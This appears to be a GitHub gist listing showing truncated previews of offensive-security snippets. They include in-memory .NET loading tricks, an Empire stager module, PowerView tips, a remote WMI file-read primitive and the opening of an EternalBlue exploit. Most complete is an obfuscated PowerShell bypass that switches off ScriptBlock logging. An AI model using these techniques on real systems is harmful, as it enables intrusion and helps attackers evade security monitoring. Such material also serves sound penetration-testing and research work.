2XXE GeneralTesler

xpn / clr_via_native.c
Created Apr 11, 2018
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
mattifestation / LoadInMemoryModule.ps1
Created Mar 30, 2018
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
enricofoltran / main.go
Last active Jan 26, 2022
A simple golang web server with basic logging, tracing, health check, graceful shutdown and zero dependencies
package main
import (
gabemarshall / jscript.ps1
Created Jan 3, 2018
Executing JScript from Powershell via .NET reflection
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'
curi0usJack / .htaccess
Last active Jan 18, 2022
# TO-DO: set |DESTINATIONURL| below to whatever you want. Do not include "http(s)://" as a prefix. All matching requests will be sent to that URL. Thanks @Meatballs__!
# Note this version requires Apache 2.4+
# Save this file as something like /etc/apache2/redirect.rules.
# Then in your site's Apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom:
# Include /etc/apache2/redirect.rules
mattifestation / FileReadPrimitive.ps1
Last active Jun 18, 2020
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
infosecn1nja /
Created Jul 21, 2017
Empire stager module to generate a .js launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
# Stager metadata dictionary (the standard Empire stager convention; the attribute name was lost in extraction)
self.info = {
'Name': 'JS Launcher StarFighter',
'Author': ['Cn33liz'],
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Jan 27, 2022
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : 'find' specific data entries in a data set
cobbr / ScriptBlockLogBypass.ps1
Last active Sep 19, 2021
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
worawit /
Last active Oct 3, 2021
Eternalblue exploit for Windows 8/2012
# This file is no longer updated. Please see
from impacket import smb, ntlm
from struct import pack
import sys
import socket
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)